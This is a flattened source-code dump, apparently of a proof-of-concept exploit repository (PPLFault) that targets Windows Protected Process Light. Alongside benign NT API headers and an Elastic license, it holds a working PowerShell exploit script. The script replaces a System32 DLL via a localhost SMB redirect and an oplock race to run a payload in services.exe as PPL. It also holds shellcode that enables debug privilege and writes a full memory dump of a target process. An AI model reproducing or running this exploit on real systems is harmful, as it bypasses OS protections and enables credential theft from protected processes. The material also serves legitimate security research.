Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE) 108 | 109 | #endif 110 | -------------------------------------------------------------------------------- /phnt/include/phnt_windows.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Win32 definition support 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_WINDOWS_H 8 | #define _PHNT_WINDOWS_H 9 | 10 | // This header file provides access to Win32, plus NTSTATUS values and some access mask values. 11 | 12 | #ifndef __cplusplus 13 | #ifndef CINTERFACE 14 | #define CINTERFACE 15 | #endif 16 | 17 | #ifndef COBJMACROS 18 | #define COBJMACROS 19 | #endif 20 | #endif 21 | 22 | #ifndef INITGUID 23 | #define INITGUID 24 | #endif 25 | 26 | #ifndef WIN32_LEAN_AND_MEAN 27 | #define WIN32_LEAN_AND_MEAN 28 | #endif 29 | 30 | #ifndef WIN32_NO_STATUS 31 | #define WIN32_NO_STATUS 32 | #endif 33 | 34 | #ifndef __cplusplus 35 | // This is needed to workaround C17 preprocessor errors when using legacy versions of the Windows SDK. (dmex) 36 | #ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 37 | #define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0 38 | #endif 39 | #endif 40 | 41 | #include 42 | #include 43 | #undef WIN32_NO_STATUS 44 | #include 45 | #include 46 | 47 | typedef double DOUBLE; 48 | typedef GUID *PGUID; 49 | 50 | // Desktop access rights 51 | #define DESKTOP_ALL_ACCESS \ 52 | (DESKTOP_CREATEMENU | DESKTOP_CREATEWINDOW | DESKTOP_ENUMERATE | \ 53 | DESKTOP_HOOKCONTROL | DESKTOP_JOURNALPLAYBACK | DESKTOP_JOURNALRECORD | \ 54 | DESKTOP_READOBJECTS | DESKTOP_SWITCHDESKTOP | DESKTOP_WRITEOBJECTS | \ 55 | STANDARD_RIGHTS_REQUIRED) 56 | #define DESKTOP_GENERIC_READ \ 57 | (DESKTOP_ENUMERATE | DESKTOP_READOBJECTS | STANDARD_RIGHTS_READ) 58 | #define DESKTOP_GENERIC_WRITE \ 59 | (DESKTOP_CREATEMENU | DESKTOP_CREATEWINDOW | DESKTOP_HOOKCONTROL | \ 60 | DESKTOP_JOURNALPLAYBACK | DESKTOP_JOURNALRECORD | DESKTOP_WRITEOBJECTS | \ 61 | STANDARD_RIGHTS_WRITE) 62 | #define DESKTOP_GENERIC_EXECUTE \ 63 | (DESKTOP_SWITCHDESKTOP | STANDARD_RIGHTS_EXECUTE) 64 | 65 | // Window station access rights 66 | #define WINSTA_GENERIC_READ \ 67 | (WINSTA_ENUMDESKTOPS | WINSTA_ENUMERATE | WINSTA_READATTRIBUTES | \ 68 | WINSTA_READSCREEN | STANDARD_RIGHTS_READ) 69 | #define WINSTA_GENERIC_WRITE \ 70 | (WINSTA_ACCESSCLIPBOARD | WINSTA_CREATEDESKTOP | WINSTA_WRITEATTRIBUTES | \ 71 | STANDARD_RIGHTS_WRITE) 72 | #define WINSTA_GENERIC_EXECUTE \ 73 | (WINSTA_ACCESSGLOBALATOMS | WINSTA_EXITWINDOWS | STANDARD_RIGHTS_EXECUTE) 74 | 75 | // WMI access rights 76 | #define WMIGUID_GENERIC_READ \ 77 | (WMIGUID_QUERY | WMIGUID_NOTIFICATION | WMIGUID_READ_DESCRIPTION | \ 78 | STANDARD_RIGHTS_READ) 79 | #define WMIGUID_GENERIC_WRITE \ 80 | (WMIGUID_SET | TRACELOG_CREATE_REALTIME | TRACELOG_CREATE_ONDISK | \ 81 | STANDARD_RIGHTS_WRITE) 82 | #define WMIGUID_GENERIC_EXECUTE \ 83 | (WMIGUID_EXECUTE | TRACELOG_GUID_ENABLE | TRACELOG_LOG_EVENT | \ 84 | TRACELOG_ACCESS_REALTIME | TRACELOG_REGISTER_GUIDS | \ 85 | STANDARD_RIGHTS_EXECUTE) 86 | 87 | #endif 88 | -------------------------------------------------------------------------------- /phnt/include/phnt.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NT Header annotations 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_H 8 | #define _PHNT_H 9 | 10 | // This header file provides access to NT APIs. 11 | 12 | // Definitions are annotated to indicate their source. If a definition is not annotated, it has been 13 | // retrieved from an official Microsoft source (NT headers, DDK headers, winnt.h). 14 | 15 | // * "winbase" indicates that a definition has been reconstructed from a Win32-ized NT definition in 16 | // winbase.h. 17 | // * "rev" indicates that a definition has been reverse-engineered. 18 | // * "dbg" indicates that a definition has been obtained from a debug message or assertion in a 19 | // checked build of the kernel or file. 20 | 21 | // Reliability: 22 | // 1. No annotation. 23 | // 2. dbg. 24 | // 3. symbols, private. Types may be incorrect. 25 | // 4. winbase. Names and types may be incorrect. 26 | // 5. rev. 27 | 28 | // Mode 29 | #define PHNT_MODE_KERNEL 0 30 | #define PHNT_MODE_USER 1 31 | 32 | // Version 33 | #define PHNT_WIN2K 50 34 | #define PHNT_WINXP 51 35 | #define PHNT_WS03 52 36 | #define PHNT_VISTA 60 37 | #define PHNT_WIN7 61 38 | #define PHNT_WIN8 62 39 | #define PHNT_WINBLUE 63 40 | #define PHNT_THRESHOLD 100 41 | #define PHNT_THRESHOLD2 101 42 | #define PHNT_REDSTONE 102 43 | #define PHNT_REDSTONE2 103 44 | #define PHNT_REDSTONE3 104 45 | #define PHNT_REDSTONE4 105 46 | #define PHNT_REDSTONE5 106 47 | #define PHNT_19H1 107 48 | #define PHNT_19H2 108 49 | #define PHNT_20H1 109 50 | #define PHNT_20H2 110 51 | #define PHNT_21H1 111 52 | #define PHNT_21H2 112 53 | #define PHNT_WIN11 113 54 | 55 | #ifndef PHNT_MODE 56 | #define PHNT_MODE PHNT_MODE_USER 57 | #endif 58 | 59 | #ifndef PHNT_VERSION 60 | #define PHNT_VERSION PHNT_WIN7 61 | #endif 62 | 63 | // Options 64 | 65 | //#define PHNT_NO_INLINE_INIT_STRING 66 | 67 | #ifdef __cplusplus 68 | extern "C" { 69 | #endif 70 | 71 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 72 | #include 73 | #include 74 | #include 75 | #endif 76 | 77 | #include 78 | #include 79 | 80 | #include 81 | #include 82 | #include 83 | #include 84 | 85 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | #include 92 | #include 93 | #include 94 | #include 95 | #endif 96 | 97 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 98 | 99 | #include 100 | #include 101 | #include 102 | #include 103 | 104 | #include 105 | 106 | #include 107 | #include 108 | 109 | #include 110 | 111 | #include 112 | 113 | #endif 114 | 115 | #ifdef __cplusplus 116 | } 117 | #endif 118 | 119 | #endif 120 | -------------------------------------------------------------------------------- /phnt/include/subprocesstag.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Subprocess tag information 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _SUBPROCESSTAG_H 8 | #define _SUBPROCESSTAG_H 9 | 10 | typedef enum _TAG_INFO_LEVEL 11 | { 12 | eTagInfoLevelNameFromTag = 1, // TAG_INFO_NAME_FROM_TAG 13 | eTagInfoLevelNamesReferencingModule, // TAG_INFO_NAMES_REFERENCING_MODULE 14 | eTagInfoLevelNameTagMapping, // TAG_INFO_NAME_TAG_MAPPING 15 | eTagInfoLevelMax 16 | } TAG_INFO_LEVEL; 17 | 18 | typedef enum _TAG_TYPE 19 | { 20 | eTagTypeService = 1, 21 | eTagTypeMax 22 | } TAG_TYPE; 23 | 24 | typedef struct _TAG_INFO_NAME_FROM_TAG_IN_PARAMS 25 | { 26 | ULONG dwPid; 27 | ULONG dwTag; 28 | } TAG_INFO_NAME_FROM_TAG_IN_PARAMS, *PTAG_INFO_NAME_FROM_TAG_IN_PARAMS; 29 | 30 | typedef struct _TAG_INFO_NAME_FROM_TAG_OUT_PARAMS 31 | { 32 | ULONG eTagType; 33 | PWSTR pszName; 34 | } TAG_INFO_NAME_FROM_TAG_OUT_PARAMS, *PTAG_INFO_NAME_FROM_TAG_OUT_PARAMS; 35 | 36 | typedef struct _TAG_INFO_NAME_FROM_TAG 37 | { 38 | TAG_INFO_NAME_FROM_TAG_IN_PARAMS InParams; 39 | TAG_INFO_NAME_FROM_TAG_OUT_PARAMS OutParams; 40 | } TAG_INFO_NAME_FROM_TAG, *PTAG_INFO_NAME_FROM_TAG; 41 | 42 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS 43 | { 44 | ULONG dwPid; 45 | PWSTR pszModule; 46 | } TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS, *PTAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS; 47 | 48 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS 49 | { 50 | ULONG eTagType; 51 | PWSTR pmszNames; 52 | } TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS, *PTAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS; 53 | 54 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE 55 | { 56 | TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS InParams; 57 | TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS OutParams; 58 | } TAG_INFO_NAMES_REFERENCING_MODULE, *PTAG_INFO_NAMES_REFERENCING_MODULE; 59 | 60 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS 61 | { 62 | ULONG dwPid; 63 | } TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS, *PTAG_INFO_NAME_TAG_MAPPING_IN_PARAMS; 64 | 65 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_ELEMENT 66 | { 67 | ULONG eTagType; 68 | ULONG dwTag; 69 | PWSTR pszName; 70 | PWSTR pszGroupName; 71 | } TAG_INFO_NAME_TAG_MAPPING_ELEMENT, *PTAG_INFO_NAME_TAG_MAPPING_ELEMENT; 72 | 73 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS 74 | { 75 | ULONG cElements; 76 | PTAG_INFO_NAME_TAG_MAPPING_ELEMENT pNameTagMappingElements; 77 | } TAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS, *PTAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS; 78 | 79 | typedef struct _TAG_INFO_NAME_TAG_MAPPING 80 | { 81 | TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS InParams; 82 | PTAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS pOutParams; 83 | } TAG_INFO_NAME_TAG_MAPPING, *PTAG_INFO_NAME_TAG_MAPPING; 84 | 85 | _Must_inspect_result_ 86 | ULONG 87 | WINAPI 88 | I_QueryTagInformation( 89 | _In_opt_ PCWSTR MachineName, 90 | _In_ TAG_INFO_LEVEL InfoLevel, 91 | _Inout_ PVOID TagInfo 92 | ); 93 | 94 | typedef ULONG (WINAPI *PQUERY_TAG_INFORMATION)( 95 | _In_opt_ PCWSTR MachineName, 96 | _In_ TAG_INFO_LEVEL InfoLevel, 97 | _Inout_ PVOID TagInfo 98 | ); 99 | 100 | #endif 101 | -------------------------------------------------------------------------------- /NoFault/NoFault.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define PHNT_MODE 0 6 | #pragma warning(push) 7 | #pragma warning(disable: 4201) // nonstandard extension used: nameless struct/union 8 | #include 9 | //#include 10 | #pragma warning(pop) 11 | 12 | extern "C" { 13 | 14 | NTSYSAPI 15 | NTSTATUS 16 | NTAPI 17 | ZwSetInformationProcess( 18 | IN HANDLE ProcessHandle, 19 | IN PROCESSINFOCLASS ProcessInformationClass, 20 | IN PVOID ProcessInformation, 21 | IN ULONG ProcessInformationLength); 22 | 23 | NTSTATUS NTAPI ZwQueryInformationProcess( 24 | _In_ HANDLE ProcessHandle, 25 | _In_ PROCESSINFOCLASS ProcessInformationClass, 26 | _Out_ PVOID ProcessInformation, 27 | _In_ ULONG ProcessInformationLength, 28 | _Out_opt_ PULONG ReturnLength 29 | ); 30 | 31 | #pragma warning(push) 32 | #pragma warning(disable: 4201) // warning C4201: nonstandard extension used: nameless struct/union 33 | #pragma warning(disable: 4214) // warning C4214: nonstandard extension used: bit field types other than int 34 | 35 | // From https://docs.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocess 36 | typedef enum _PS_PROTECTED_TYPE { 37 | PsProtectedTypeNone = 0, 38 | PsProtectedTypeProtectedLight = 1, 39 | PsProtectedTypeProtected = 2 40 | } PS_PROTECTED_TYPE, * PPS_PROTECTED_TYPE; 41 | 42 | typedef enum _PS_PROTECTED_SIGNER { 43 | PsProtectedSignerNone = 0, 44 | PsProtectedSignerAuthenticode, 45 | PsProtectedSignerCodeGen, 46 | PsProtectedSignerAntimalware, 47 | PsProtectedSignerLsa, 48 | PsProtectedSignerWindows, 49 | PsProtectedSignerWinTcb, 50 | PsProtectedSignerWinSystem, 51 | PsProtectedSignerApp, 52 | PsProtectedSignerMax 53 | } PS_PROTECTED_SIGNER, * PPS_PROTECTED_SIGNER; 54 | 55 | typedef struct _PS_PROTECTION { 56 | union { 57 | UCHAR Level; 58 | struct { 59 | UCHAR Type : 3; 60 | UCHAR Audit : 1; // Reserved 61 | UCHAR Signer : 4; 62 | }; 63 | }; 64 | } PS_PROTECTION, * PPS_PROTECTION; 65 | 66 | // private 67 | typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION 68 | { 69 | PROCESS_MITIGATION_POLICY Policy; 70 | union 71 | { 72 | PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy; 73 | PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy; 74 | PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy; 75 | PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy; 76 | PROCESS_MITIGATION_DYNAMIC_CODE_POLICY DynamicCodePolicy; 77 | PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY ControlFlowGuardPolicy; 78 | PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY SignaturePolicy; 79 | PROCESS_MITIGATION_FONT_DISABLE_POLICY FontDisablePolicy; 80 | PROCESS_MITIGATION_IMAGE_LOAD_POLICY ImageLoadPolicy; 81 | PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY SystemCallFilterPolicy; 82 | PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY PayloadRestrictionPolicy; 83 | PROCESS_MITIGATION_CHILD_PROCESS_POLICY ChildProcessPolicy; 84 | PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY SideChannelIsolationPolicy; 85 | PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY UserShadowStackPolicy; 86 | PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY RedirectionTrustPolicy; 87 | }; 88 | } PROCESS_MITIGATION_POLICY_INFORMATION, * PPROCESS_MITIGATION_POLICY_INFORMATION; 89 | 90 | #pragma warning(pop) 91 | 92 | } -------------------------------------------------------------------------------- /python/PPLFault-Localhost-SMB.ps1: -------------------------------------------------------------------------------- 1 | 2 | $SMBListeners = Get-NetTcpConnection | Where LocalPort -eq 445 | Where State -eq Listen 3 | if ($SMBListeners -and ($SMBListeners).OwningProcess -eq 4) 4 | { 5 | Write-Output "Performing setup." 6 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force 7 | Install-Module NtObjectManager -Force 8 | Set-Service -Name LanManServer -StartupType Disabled 9 | winget install Python.Python.3.8 --accept-source-agreements --accept-package-agreements 10 | py -m pip install wheel 11 | py -m pip install pywin32 impacket pefile 12 | 13 | Write-Output "" 14 | Write-Output "Setup complete. Please any key to reboot the machine." 15 | Write-Output "After reboot, re-run this script to perform the exploit" 16 | pause 17 | shutdown /r /t 0 18 | } 19 | 20 | # Setup - redirect a DLL over localhost SMB 21 | (Get-NtToken).SetPrivilege("SeBackupPrivilege", $true) 22 | (Get-NtToken).SetPrivilege("SeRestorePrivilege", $true) 23 | Rename-NtFile '\??\C:\Windows\System32\EventAggregation.dll' -NewName '\??\C:\Windows\System32\EventAggregation.dll.bak' -Options OpenForBackupIntent -ShareMode Read,Write,Delete -Access Delete 24 | cmd /c mklink C:\Windows\System32\EventAggregation.dll \\127.0.0.1\C$\Windows\System32\EventAggregation.dll.bak 25 | 26 | # Set an oplock that will let us force a race condition in service.exe's initialization 27 | $OplockPath = "\??\C:\Windows\System32\devobj.dll" 28 | $OplockFile = Get-NtFile -Path $OplockPath -Access ReadAttributes 29 | $Oplock = Start-NtFileOplock $OplockFile -Async -Exclusive 30 | 31 | # Payload to run as PPL 32 | 33 | # This payload requires a kernel debugger to view 34 | # If you use this payload, type this in WinDbg afterwards: db @rip; dx @$curprocess->Name; dx @$curprocess->KernelObject->Protection 35 | # $Payload = "CC" + ("90" * 16) + ("CAFEC0DE" * 64) 36 | 37 | # Simple "infinite loop" payload 38 | $Payload = "EBFE" 39 | 40 | # Restart local SMB server 41 | taskkill /f /im python.exe 42 | cmd /c start py smbserver.py -payload $Payload 43 | start-sleep 1 44 | 45 | # Start services.exe and wait for it to initiate an oplock break 46 | $BeforeProcs = Get-Process -Name services 47 | py -c "import win32process; si = win32process.STARTUPINFO(); win32process.CreateProcess(r'C:\Windows\System32\services.exe',None,None,None,False,0x40000,None,None,si)" 48 | Wait-AsyncTaskResult $Oplock 49 | 50 | # Empty working sets 51 | py -c "import ctypes; cmd=ctypes.c_ulong(2); ctypes.windll.ntdll.RtlAdjustPrivilege(13,True,False,ctypes.byref(ctypes.c_ulong())); print(ctypes.windll.ntdll.NtSetSystemInformation(80, ctypes.byref(cmd), ctypes.sizeof(cmd)))" 52 | # Empty standby list 53 | py -c "import ctypes; cmd=ctypes.c_ulong(4); ctypes.windll.ntdll.RtlAdjustPrivilege(13,True,False,ctypes.byref(ctypes.c_ulong())); print(ctypes.windll.ntdll.NtSetSystemInformation(80, ctypes.byref(cmd), ctypes.sizeof(cmd)))" 54 | 55 | start-sleep 1 56 | 57 | # Release PPL services.exe 58 | Confirm-NtFileOplock $OplockFile -Level Acknowledge 59 | 60 | start-sleep 2 61 | taskkill /f /im python.exe 62 | 63 | # Cleanup 64 | Remove-Item 'C:\Windows\System32\EventAggregation.dll' 65 | Rename-NtFile '\??\C:\Windows\System32\EventAggregation.dll.bak' -NewName '\??\C:\Windows\System32\EventAggregation.dll' -Options OpenForBackupIntent -ShareMode Read,Write,Delete -Access Delete 66 | 67 | $AfterProcs = Get-Process -Name services | Where-Object {$_.Id -NotIn $BeforeProcs.Id} 68 | 69 | $NewPid = $AfterProcs[0].Id 70 | $Protection = (Get-NtProcess $NewPid -Access QueryLimitedInformation).Protection 71 | $ProtectionType = $Protection.Type 72 | $ProtectionSigner = $Protection.Signer 73 | 74 | Write-Output "" 75 | Write-Output "services.exe (PID $NewPid) is running as $ProtectionSigner-$ProtectionType" 76 | Write-Output "Check it out in Task Manager - it should be spinning a CPU core" 77 | taskmgr.exe 78 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.c: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "DumpShellcode.h" 10 | 11 | #pragma optimize("", off) 12 | 13 | PSHELLCODE_PARAMS GetParams(); 14 | 15 | // Overwrites DllMain (technically CRT DllMain) 16 | BOOL APIENTRY Shellcode( 17 | HMODULE hModule, 18 | DWORD ul_reason_for_call, 19 | LPVOID lpReserved 20 | ) 21 | { 22 | PSHELLCODE_PARAMS pParams = NULL; 23 | MiniDumpWriteDump_t pMiniDumpWriteDump = NULL; 24 | HANDLE hProcess = NULL; 25 | HANDLE hFile = NULL; 26 | HMODULE hDbgHelp = NULL; 27 | DWORD ignored = 0; 28 | 29 | pParams = GetParams(); 30 | 31 | // Resolve remaining import 32 | hDbgHelp = pParams->pLoadLibraryW(pParams->szDbgHelpDll); 33 | if (NULL == hDbgHelp) 34 | { 35 | __debugbreak(); 36 | } 37 | 38 | pMiniDumpWriteDump = (MiniDumpWriteDump_t)pParams->pGetProcAddress(hDbgHelp, pParams->szMiniDumpWriteDump); 39 | if (NULL == pMiniDumpWriteDump) 40 | { 41 | __debugbreak(); 42 | } 43 | 44 | // Enable SeDebugPrivilege 45 | if (0 != pParams->pRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &ignored)) 46 | { 47 | __debugbreak(); 48 | } 49 | 50 | // Acquire handle to target 51 | hProcess = pParams->pOpenProcess(MAXIMUM_ALLOWED, FALSE, pParams->dwTargetProcessId); 52 | if (NULL == hProcess) 53 | { 54 | __debugbreak(); 55 | } 56 | 57 | // Create output file 58 | hFile = pParams->pCreateFileW(pParams->dumpPath, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 59 | if (INVALID_HANDLE_VALUE == hFile) 60 | { 61 | __debugbreak(); 62 | } 63 | 64 | // Capture dump 65 | if (!pMiniDumpWriteDump(hProcess, pParams->dwTargetProcessId, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL)) 66 | { 67 | __debugbreak(); 68 | } 69 | 70 | // Don't trigger WER 71 | (void)pParams->pTerminateProcess((HANDLE)-1, 0); 72 | 73 | return TRUE; 74 | } 75 | 76 | PVOID WhereAmI() 77 | { 78 | return _ReturnAddress(); 79 | } 80 | 81 | PSHELLCODE_PARAMS GetParams() 82 | { 83 | PUCHAR pSearch = (PUCHAR)WhereAmI(); 84 | 85 | for (;;pSearch++) 86 | { 87 | PSHELLCODE_PARAMS pCandidate = (PSHELLCODE_PARAMS)pSearch; 88 | 89 | if ((MAGIC1 == pCandidate->magic1) && (MAGIC2 == pCandidate->magic2)) 90 | { 91 | return pCandidate; 92 | } 93 | } 94 | 95 | return NULL; 96 | } 97 | 98 | BOOL EndShellcode() 99 | { 100 | return TRUE; 101 | } 102 | 103 | #include 104 | 105 | int main() 106 | { 107 | WCHAR myPath[MAX_PATH] = { 0, }; 108 | HMODULE hMe = GetModuleHandle(NULL); 109 | PUCHAR shellcodeStart = (PUCHAR)GetProcAddress(hMe, "Shellcode"); 110 | PUCHAR shellcodeEnd = (PUCHAR)GetProcAddress(hMe, "EndShellcode"); 111 | const SIZE_T shellcodeLength = (DWORD)(ULONG_PTR)(shellcodeEnd - shellcodeStart); 112 | HMODULE hFile = NULL; 113 | DWORD bytesWritten = 0; 114 | 115 | GetModuleFileNameW(NULL, myPath, ARRAYSIZE(myPath)); 116 | wcsncat(myPath, L".shellcode", ARRAYSIZE(myPath) - wcslen(myPath)); 117 | 118 | hFile = CreateFileW(myPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 119 | if (INVALID_HANDLE_VALUE == hFile) 120 | { 121 | printf(" [!] Failed to open output file: %ws\n", myPath); 122 | return 1; 123 | } 124 | if (!WriteFile(hFile, shellcodeStart, (DWORD)shellcodeLength, &bytesWritten, NULL) || 125 | (bytesWritten != shellcodeLength)) 126 | { 127 | printf(" [!] Failed to write shellcode with GLE %u\n", GetLastError()); 128 | return 1; 129 | } 130 | 131 | printf(" [+] Shellcode written to output file: %ws\n", myPath); 132 | 133 | return 0; 134 | } 135 | -------------------------------------------------------------------------------- /phnt/include/ntmisc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Trace Control support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTMISC_H 8 | #define _NTMISC_H 9 | 10 | // Filter manager 11 | 12 | #define FLT_PORT_CONNECT 0x0001 13 | #define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT | STANDARD_RIGHTS_ALL) 14 | 15 | // VDM 16 | 17 | typedef enum _VDMSERVICECLASS 18 | { 19 | VdmStartExecution, 20 | VdmQueueInterrupt, 21 | VdmDelayInterrupt, 22 | VdmInitialize, 23 | VdmFeatures, 24 | VdmSetInt21Handler, 25 | VdmQueryDir, 26 | VdmPrinterDirectIoOpen, 27 | VdmPrinterDirectIoClose, 28 | VdmPrinterInitialize, 29 | VdmSetLdtEntries, 30 | VdmSetProcessLdtInfo, 31 | VdmAdlibEmulation, 32 | VdmPMCliControl, 33 | VdmQueryVdmProcess, 34 | VdmPreInitialize 35 | } VDMSERVICECLASS, *PVDMSERVICECLASS; 36 | 37 | NTSYSCALLAPI 38 | NTSTATUS 39 | NTAPI 40 | NtVdmControl( 41 | _In_ VDMSERVICECLASS Service, 42 | _Inout_ PVOID ServiceData 43 | ); 44 | 45 | // WMI/ETW 46 | 47 | NTSYSCALLAPI 48 | NTSTATUS 49 | NTAPI 50 | NtTraceEvent( 51 | _In_ HANDLE TraceHandle, 52 | _In_ ULONG Flags, 53 | _In_ ULONG FieldSize, 54 | _In_ PVOID Fields 55 | ); 56 | 57 | typedef enum _TRACE_CONTROL_INFORMATION_CLASS 58 | { 59 | TraceControlStartLogger = 1, // inout WMI_LOGGER_INFORMATION 60 | TraceControlStopLogger = 2, // inout WMI_LOGGER_INFORMATION 61 | TraceControlQueryLogger = 3, // inout WMI_LOGGER_INFORMATION 62 | TraceControlUpdateLogger = 4, // inout WMI_LOGGER_INFORMATION 63 | TraceControlFlushLogger = 5, // inout WMI_LOGGER_INFORMATION 64 | TraceControlIncrementLoggerFile = 6, // inout WMI_LOGGER_INFORMATION 65 | TraceControlUnknown = 7, 66 | // unused 67 | TraceControlRealtimeConnect = 11, 68 | TraceControlActivityIdCreate = 12, 69 | TraceControlWdiDispatchControl = 13, 70 | TraceControlRealtimeDisconnectConsumerByHandle = 14, // in HANDLE 71 | TraceControlRegisterGuidsCode = 15, 72 | TraceControlReceiveNotification = 16, 73 | TraceControlSendDataBlock = 17, // ETW_ENABLE_NOTIFICATION_PACKET 74 | TraceControlSendReplyDataBlock = 18, 75 | TraceControlReceiveReplyDataBlock = 19, 76 | TraceControlWdiUpdateSem = 20, 77 | TraceControlEnumTraceGuidList = 21, // out GUID[] 78 | TraceControlGetTraceGuidInfo = 22, // in GUID, out TRACE_GUID_INFO 79 | TraceControlEnumerateTraceGuids = 23, 80 | TraceControlRegisterSecurityProv = 24, 81 | TraceControlQueryReferenceTime = 25, 82 | TraceControlTrackProviderBinary = 26, // in HANDLE 83 | TraceControlAddNotificationEvent = 27, 84 | TraceControlUpdateDisallowList = 28, 85 | TraceControlSetEnableAllKeywordsCode = 29, 86 | TraceControlSetProviderTraitsCode = 30, 87 | TraceControlUseDescriptorTypeCode = 31, 88 | TraceControlEnumTraceGroupList = 32, 89 | TraceControlGetTraceGroupInfo = 33, 90 | TraceControlTraceSetDisallowList = 34, 91 | TraceControlSetCompressionSettings = 35, 92 | TraceControlGetCompressionSettings = 36, 93 | TraceControlUpdatePeriodicCaptureState = 37, 94 | TraceControlGetPrivateSessionTraceHandle = 38, 95 | TraceControlRegisterPrivateSession = 39, 96 | TraceControlQuerySessionDemuxObject = 40, 97 | TraceControlSetProviderBinaryTracking = 41, 98 | TraceControlMaxLoggers = 42, // out ULONG 99 | TraceControlMaxPmcCounter = 43, // out ULONG 100 | TraceControlQueryUsedProcessorCount = 44, // ULONG // since WIN11 101 | TraceControlGetPmcOwnership = 45, 102 | } TRACE_CONTROL_INFORMATION_CLASS; 103 | 104 | #if (PHNT_VERSION >= PHNT_VISTA) 105 | NTSYSCALLAPI 106 | NTSTATUS 107 | NTAPI 108 | NtTraceControl( 109 | _In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass, 110 | _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, 111 | _In_ ULONG InputBufferLength, 112 | _Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation, 113 | _In_ ULONG TraceInformationLength, 114 | _Out_ PULONG ReturnLength 115 | ); 116 | #endif 117 | 118 | #endif 119 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Elastic License 2.0 2 | 3 | URL: https://www.elastic.co/licensing/elastic-license 4 | 5 | ## Acceptance 6 | 7 | By using the software, you agree to all of the terms and conditions below. 8 | 9 | ## Copyright License 10 | 11 | The licensor grants you a non-exclusive, royalty-free, worldwide, 12 | non-sublicensable, non-transferable license to use, copy, distribute, make 13 | available, and prepare derivative works of the software, in each case subject to 14 | the limitations and conditions below. 15 | 16 | ## Limitations 17 | 18 | You may not provide the software to third parties as a hosted or managed 19 | service, where the service provides users with access to any substantial set of 20 | the features or functionality of the software. 21 | 22 | You may not move, change, disable, or circumvent the license key functionality 23 | in the software, and you may not remove or obscure any functionality in the 24 | software that is protected by the license key. 25 | 26 | You may not alter, remove, or obscure any licensing, copyright, or other notices 27 | of the licensor in the software. Any use of the licensor’s trademarks is subject 28 | to applicable law. 29 | 30 | ## Patents 31 | 32 | The licensor grants you a license, under any patent claims the licensor can 33 | license, or becomes able to license, to make, have made, use, sell, offer for 34 | sale, import and have imported the software, in each case subject to the 35 | limitations and conditions in this license. This license does not cover any 36 | patent claims that you cause to be infringed by modifications or additions to 37 | the software. If you or your company make any written claim that the software 38 | infringes or contributes to infringement of any patent, your patent license for 39 | the software granted under these terms ends immediately. If your company makes 40 | such a claim, your patent license ends immediately for work on behalf of your 41 | company. 42 | 43 | ## Notices 44 | 45 | You must ensure that anyone who gets a copy of any part of the software from you 46 | also gets a copy of these terms. 47 | 48 | If you modify the software, you must include in any modified copies of the 49 | software prominent notices stating that you have modified the software. 50 | 51 | ## No Other Rights 